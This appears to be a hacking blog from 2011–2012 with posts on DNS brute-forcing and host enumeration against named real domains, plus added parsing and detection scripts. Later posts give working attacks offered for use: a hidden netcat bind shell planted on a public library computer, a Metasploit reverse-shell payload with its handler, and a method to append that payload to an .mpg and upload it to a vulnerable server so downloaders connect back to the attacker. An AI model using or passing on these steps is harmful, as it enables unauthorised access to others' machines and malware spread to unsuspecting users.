Monday, July 2, 2012

DNS Brute force

Using a list of common host names that I update whenever I find a new one through a zone transfer, I make a script to try hostname.domain.com for each entry. Here is my hostname list.

www
www2
mail
smtp
pop3
mailgw
proxy
vpn
ssl
imap
ns1
ns2
router
cisco
conf
exchange
isa
juniper
gopher
irc

Next I wrote the script to query each name in the file against a given domain.

#!/bin/bash
# Try every name in names.txt as a subdomain and keep only the lines that resolved
for name in $(cat names.txt); do
    host "$name.docstar.com" | grep "has address"
done

The output will give you the list of resolved names:

docstar.com has address 50.57.86.180
www2.docstar.com has address 67.215.65.132
mail.docstar.com has address 206.17.147.38
smtp.docstar.com has address 67.215.65.132
pop3.docstar.com has address 67.215.65.132
mailgw.docstar.com has address 67.215.65.132
proxy.docstar.com has address 67.215.65.132
vpn.docstar.com has address 67.215.65.132
ssl.docstar.com has address 67.215.65.132
imap.docstar.com has address 67.215.65.132
ns1.docstar.com has address 67.215.65.132
ns2.docstar.com has address 67.215.65.132
router.docstar.com has address 67.215.65.132
cisco.docstar.com has address 67.215.65.132
conf.docstar.com has address 67.215.65.132
exchange.docstar.com has address 67.215.65.132
isa.docstar.com has address 67.215.65.132
juniper.docstar.com has address 67.215.65.132
gopher.docstar.com has address 67.215.65.132
irc.docstar.com has address 67.215.65.132

Just to clean it up I will throw cut into the script, using a space as the delimiter and taking field 4:

|cut -d " " -f4

Next I'll append the output to a file:

 >>docstarip.txt

cat docstarip.txt | sort -u

206.17.147.38
50.57.86.180
67.215.65.132

Friday, June 29, 2012

IP Enumeration

Now, to find the IP addresses of the Yahoo hosts we piped into yahoohost.txt, I'm going to make a quick bash script to retrieve the IP addresses.

[root@localhost yahoo]# nano yahooip.sh
#!/bin/bash
# Resolve every hostname listed in yahoohost.txt
for hostname in $(cat yahoohost.txt); do
    host "$hostname"
done
[root@localhost yahoo]# chmod 775 yahooip.sh

Now, after running this, the output isn't that pretty, to say the least. I'll get aliases such as
"www.yahoo.com is an alias for fd-fp3.wg1.b.yahoo.com."
and other garbage, so let's clean up the script a little bit.

#!/bin/bash
# Resolve every hostname and keep only the A-record lines
for hostname in $(cat yahoohost.txt); do
    host "$hostname" | grep " has address"
done

That is better:
"any-ycpi-uno.aycpi.b.yahoodns.net has address 98.136.145.152"
To clean this up further we can use cut with a space as the delimiter and take the 4th field.

Now we get a list of IPs, with many duplicates. For some reason, when I put | sort -u in the script it does not work. If anyone knows how to do this, let me know.

So I just redirect the IPs into yahooip.txt:

[root@localhost yahoo]# ./yahooip.sh >yahooip.txt

Then cat it out through | sort -u:

[root@localhost yahoo]# cat yahooip.txt | sort -u
216.115.101.178
216.115.101.179
74.6.117.48
74.6.238.254
76.13.115.116
98.136.145.152
98.136.145.153
98.136.145.154
98.136.145.155
98.136.145.156
98.136.145.157
98.136.70.45
98.136.78.47
98.137.220.33
98.139.138.100
98.139.169.19
98.139.183.24
98.139.235.15
98.139.241.94
98.139.52.59

That is it; we have enumerated IPs for the hostnames we got.
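As an added example covering both this post and the DNS brute force one above (not the blog's own script), here is the parsing side of the loop run offline on a constructed sample of host output: sort -u placed where it actually removes duplicates, plus an awk pass that keeps the alias-to-address mapping a plain grep for "has address" loses. The example.com names and addresses are constructed.

```shell
#!/bin/bash
# Constructed sample of what host(1) prints: a CNAME, plain A records,
# an AAAA record, two names sharing one address and a name that does not
# exist.  Nothing here was resolved against a real zone.
SAMPLE_HOST_OUTPUT='www.example.com is an alias for example.com.
example.com has address 203.0.113.10
mail.example.com has address 203.0.113.20
mail.example.com has IPv6 address 2001:db8::20
smtp.example.com has address 203.0.113.20
Host bogus.example.com not found: 3(NXDOMAIN)
ns1.example.com has address 198.51.100.53'

# Keep the A-record lines, take the 4th space-separated field (the IPv4
# address) and collapse duplicates.  sort -u has to see the whole stream,
# so it belongs after the loop, not inside it:
#   for name in $(cat names.txt); do host "$name.example.com"; done | unique_ips
# Inside the loop it only ever sees one host's answer at a time and can
# never remove a duplicate shared by two hosts.
unique_ips() {
    grep ' has address ' | cut -d ' ' -f4 | sort -u
}

# Map each queried name to its address.  For a CNAME, host prints the
# "has address" line for the canonical name, not the name that was asked
# for, so a plain grep loses which alias led there; remember the alias
# and substitute it back (host prints the canonical name with a trailing
# dot on the alias line but without one on the address line).
name_to_ip() {
    awk '/ is an alias for / { t = $NF; sub(/\.$/, "", t); alias[t] = $1; next }
         / has address /     { n = ($1 in alias) ? alias[$1] : $1; print n, $4 }'
}

printf '%s\n' "$SAMPLE_HOST_OUTPUT" | unique_ips
printf '%s\n' "$SAMPLE_HOST_OUTPUT" | name_to_ip
```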

Thursday, June 28, 2012

Bash Text Manipulation

I've been trying to get into programming, so I've decided to start with some scripting to automate some enumeration. I originally started with Bash text manipulation; here is an example I did using Yahoo to enumerate hosts.

[root@localhost yahoo]# wget yahoo.com
--15:37:08--  http://yahoo.com/
           => `index.html'
Resolving yahoo.com... 98.139.183.24, 72.30.38.140, 209.191.122.70
Connecting to yahoo.com|98.139.183.24|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.yahoo.com/ [following]
--15:37:09--  http://www.yahoo.com/
           => `index.html'
Resolving www.yahoo.com... 98.139.183.24, 2001:4998:f00b:1fe::3001, 2001:4998:f00b:1fe::3000
Connecting to www.yahoo.com|98.139.183.24|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

    [       <=>                                ] 225,798      177.62K/s

15:37:10 (177.13 KB/s) - `index.html' saved [225798]

[root@localhost yahoo]# cat index.html | grep href | cut -d "/" -f3 | grep yahoo.com | cut -d '"' -f1 | sort -u
apps.search.yahoo.com
autos.yahoo.com
everything.yahoo.com
finance.yahoo.com
images.search.yahoo.com
info.yahoo.com
local.search.yahoo.com
login.yahoo.com
movies.yahoo.com
music.yahoo.com
news.yahoo.com
omg.yahoo.com
screen.yahoo.com
search.yahoo.com
shine.yahoo.com
shopping.yahoo.com
sports.yahoo.com
tools.search.yahoo.com
tv.yahoo.com
video.search.yahoo.com
weather.yahoo.com
www.yahoo.com

So just to explain what I did here, I'm going to take a link out of index.html and break it down:
a href="http://weather.yahoo.com/redirwoei/12760452"
So I'm outputting every line that contains href in index.html, as shown above.
Next I'm cutting using a delimiter of / and I only want the information from field 3.
The 1st field would be a href="http:/"
The 2nd field would be "/"
The 3rd field would be weather.yahoo.com/"
Next I'm telling it to output only the yahoo.com domain, since there were links to imgur etc.
Now this is pretty good, but I do get some stragglers such as
www.yahoo.com">
www.yahoo.com">
So now I will cut using a delimiter of ". Since it is a double quote I need to surround it with single quotes, and I want field 1.
Finally I will sort it unique and redirect it to a file: >yahoohost.txt
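As an added example, not the blog's own pipeline, here is the same extraction written so it copes with the stragglers by itself: it accepts single- or double-quoted hrefs, skips relative links, strips ports and anchors the domain match so a lookalike host is not counted. The page fragment and the example.com hosts are constructed.

```shell
#!/bin/bash
# Constructed page fragment with the cases a plain cut pipeline trips
# over: relative and protocol-relative links, a port, single quotes, two
# links on one line and a lookalike domain.
SAMPLE_HTML=$(cat <<'EOF'
<a href="http://weather.example.com/redir/12760452">Weather</a>
<a class="nav" href="https://login.example.com:443/?.src=ym">Login</a>
<a href="//news.example.com/">News</a>
<a href='http://mail.example.com/inbox'>Mail</a>
<img src="http://cdn.other-site.net/logo.png"><a href="/local/page.html">Local</a>
<a href="http://www.example.com">Home</a><a href="http://www.example.com/">Home again</a>
<a href="http://www.example.com.evil-domain.net/">lookalike</a>
EOF
)

# Usage: hosts_from_html DOMAIN < page.html
# Prints the unique hostnames under DOMAIN that the page links to.
hosts_from_html() {
    # escape the dots so "example.com" cannot match "exampleXcom"
    pattern=$(printf '%s' "$1" | sed 's/\./\\./g')
    # 1. every href value, whichever quote style the page uses
    grep -oE "href=[\"'][^\"']+[\"']" |
    # 2. drop the href= prefix and both quotes
    sed -E "s/^href=[\"']//; s/[\"']$//" |
    # 3. keep absolute and protocol-relative URLs only, then strip the
    #    scheme and the leading //
    grep -E '^([a-z]+:)?//' | sed -E 's#^([a-z]+:)?//##' |
    # 4. host is everything up to the first /, then drop any :port
    cut -d / -f1 | cut -d : -f1 |
    # 5. anchor the domain at the end so www.example.com.evil-domain.net
    #    does not slip through, and collapse duplicates
    grep -E "(^|\\.)${pattern}\$" | sort -u
}

printf '%s\n' "$SAMPLE_HTML" | hosts_from_html example.com
```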

Friday, July 8, 2011

Bind shell using Netcat

So I did this while I was at a library, since you do not need admin rights and I didn't need to sit at the computer. I set up a netcat listener on port 4444 so I could connect to the computer from anywhere in the building. First I got a VBScript straight from MS so that you do not see the listener running; to create a hidden process in Windows I used the script I found here.

Next I downloaded netcat for Windows and created a batch script to run the command I wanted:
C:\Users\Syrus\Documents\nc\nc.exe -lvp 4444 -e cmd.exe
Next I edited the VBScript to include the batch file I made:
Const HIDDEN_WINDOW = 12

strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")

Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("C:\Users\Syrus\Documents\test.bat", null, objConfig, intProcessID)

So this pipes cmd.exe to a listener on port 4444; all I need to do is find the IP of the victim and use netcat to connect. I did this by running:
$ nc -vn 10.10.9.171 4444
Connection to 10.10.9.171 4444 port [tcp/*] succeeded!
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Now I have access to the computer from pretty much anywhere in the building. Have fun!

Monday, June 27, 2011

Google Enumeration


Thursday, June 23, 2011

Combining Files

I’m going to combine my two previous posts (here and here), now for this exploit in combining files. Say you find a site vulnerable to PUT * HTTP/1.0 that has downloadable content. I would recommend downloading a file off the server; in this case, for me, it will be 03.mpg. I’m going to combine 03.mpg with my Metasploit binary payload meterpreter.exe.
We can use Windows command prompt in order to do this.
C:\>copy /B 03.mpg + meterpreter.exe file.mpg
03.mpg
meterpreter.exe
1 file(s) copied.
The /B switch tells copy to treat the files as binary. So now you can take file.mpg, rename it to 03.mpg and PUT it back on the server; whenever someone downloads the file and runs it, it will spawn a meterpreter session back to you. Say you do this on a porn site and you can get multiple meterpreter sessions for easy exploiting.

Enjoy!
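From the defender's side, as an added example that is not from the blog: a shell check for the concatenation this post describes. It builds a constructed stand-in for 03.mpg, appends a constructed stand-in for an executable header (just the MZ signature and DOS-stub text, not a real program), and scans for the DOS-stub text that every Windows executable carries. Assumes GNU grep for -a, -b and -o.

```shell
#!/bin/bash
# Everything below is a constructed sample, not a real media file or
# executable.  Assumes GNU grep.
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# 1. A stand-in for 03.mpg: an MPEG program-stream magic number followed
#    by filler "frames" (4 + 100 * 21 = 2104 bytes).
{
    printf '\000\000\001\272'
    i=0
    while [ "$i" -lt 100 ]; do printf 'fake mpeg frame data\n'; i=$((i + 1)); done
} > "$WORK/clean.mpg"

# 2. A stand-in for the appended payload: only the MZ signature (8 bytes
#    here) and the DOS-stub text every Windows executable starts with.
printf 'MZ\220\000\003\000\000\000This program cannot be run in DOS mode.\r\r\n$' > "$WORK/stub.bin"

# 3. What copy /B 03.mpg + meterpreter.exe file.mpg produces: both files
#    back to back, media first.
cat "$WORK/clean.mpg" "$WORK/stub.bin" > "$WORK/combined.mpg"

# Byte offset of every DOS-stub string in the file.  file(1) still calls
# combined.mpg an MPEG stream because it only inspects the leading magic
# bytes, so a whole-file scan is needed.  A real .exe carries the stub
# within its first few hundred bytes; a media file should not carry it
# at all, and a hit thousands of bytes in marks roughly where the
# appended executable begins.
embedded_pe_offsets() {
    grep -a -b -o 'This program cannot be run in DOS mode' "$1" | cut -d : -f1
}

# Exit status 0 when the file carries an embedded executable, e.g.
#   find downloads -name '*.mpg' | while read -r f; do has_embedded_pe "$f" && echo "$f"; done
has_embedded_pe() {
    [ -n "$(embedded_pe_offsets "$1")" ]
}

for f in "$WORK/clean.mpg" "$WORK/combined.mpg"; do
    if has_embedded_pe "$f"; then
        echo "$f: DOS stub at byte offset $(embedded_pe_offsets "$f")"
    else
        echo "$f: clean"
    fi
done
```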

Wednesday, June 22, 2011

Metasploit Binary Payload

Once again we are going to start off simple. We are going to use Metasploit to make a binary payload using a reverse TCP meterpreter session. First we are going to export the Metasploit meterpreter to a file. We do this via the following command. The LHOST will be your computer’s IP address so the victim knows where to connect back to. We are going to redirect the output of the command to a file named meterpreter.exe in the root of my HTTP server for simplicity.

[root@localhost app]# ./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.70.197 X >/var/www/html/meterpreter.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"10.10.13.247"}
Next we are going to give the file rw permission:
[root@localhost app]# chmod 665 /var/www/html/meterpreter.exe
Now on the attacking box we need to set up a meterpreter listener.
[root@localhost app]# ./msfconsole
=[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ -- --=[ 687 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12635 updated 37 days ago (2011.05.16)

Warning: This copy of the Metasploit Framework was last updated 37 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST x.x.70.197
LHOST => x.x.70.197
msf exploit(handler) > exploit
[*] Started reverse handler on x.x.70.197:4444
[*] Starting the payload handler...

Next run the executable on the victim's computer (I’ll show a better way to do this later down the road).

[*]Transmitting intermediate stager for over-sized stage…(89 bytes)
[*]Sending stage (2834 bytes)
[*]Sleeping before handling stage…
[*]Uploading DLL (81931 bytes)…
[*]Upload completed.
[*]Meterpreter session 1 opened (x.x.70.197:4444 -> x.x.200.252:1227
meterpreter >

This has a lot of possibilities. If you want to compromise a server you can find one that was vulnerable to my last post, put in a file that gives you command line access to the server and run the executable on the server itself. This way you get a privileged session to the entire server as opposed to a directory if it is jailed.